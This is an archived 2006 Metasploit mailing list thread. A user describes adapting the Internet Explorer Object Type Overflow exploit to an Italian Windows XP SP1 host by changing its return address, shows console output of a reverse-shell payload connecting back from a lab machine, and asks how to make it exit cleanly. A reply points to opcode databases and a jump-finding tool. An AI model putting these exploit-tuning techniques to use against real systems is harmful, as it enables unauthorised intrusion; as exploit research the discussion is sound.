Metasploit mailing list archives
Internet Explorer Object Type Overflow
From: jerome.athias at free.fr (Jerome Athias)
Date: Wed, 31 May 2006 11:45:20 +0200
Hi, you can find some usefull addresses here: https://www.securinfos.info/international-opcodes/index.php also you can use this tool : https://www.securinfos.info/outils-securite-hacking/Findjmp2.zip and an example of exploitation on the Windows platform: http://www.hackingdefined.com/index.php/Savant_Buffer_Overflow /JA Angelo Dell'Aera a ?crit :
Hello, first of all I have to say I'm not a real expert in the Windows world. While trying to exploit Internet Explorer Object Type Overflow on a host running Windows XP Professional SP1 through Metasploit I realized that the ws2_32 push esp/ret (which is located at 0x71ab1d54 for the English version) is located at 0x71a31d54 for the Italian version thus I modified the ie_objecttype.pm this way "Windows XP" => [ 0x71a31d54, 0x7ffdec50 ], # ws2_32 push esp/ret SP0/1 When I tried to exploit the vulnerable host I saw IE crashing and on the attacker's side this behavior... msf ie_objecttype(win32_reverse) > exploit [*] Starting Reverse Handler. [*] Waiting for connections to http://192.168.33.162:8080 ... [*] HTTP Client connected from 192.168.33.107:1392 using Windows XP, sending payload... [*] Got connection from 192.168.33.162:4321 <-> 192.168.33.107:1393 [*] Exiting Reverse Handler. I tried attaching iexplore.exe with ollydbg and observed an access violation when writing to the address 0x77e40000 (this address is in ECX and EBX when the access violation is triggered). I suppose I'll need to modify even the second address in the target array in order to exit in a clean way but I'm really not skilled in the Windows world and so hints about how to do it are really welcome. Regards,
Current thread:
- Internet Explorer Object Type Overflow Angelo Dell'Aera (May 31)
- Internet Explorer Object Type Overflow Jerome Athias (May 31)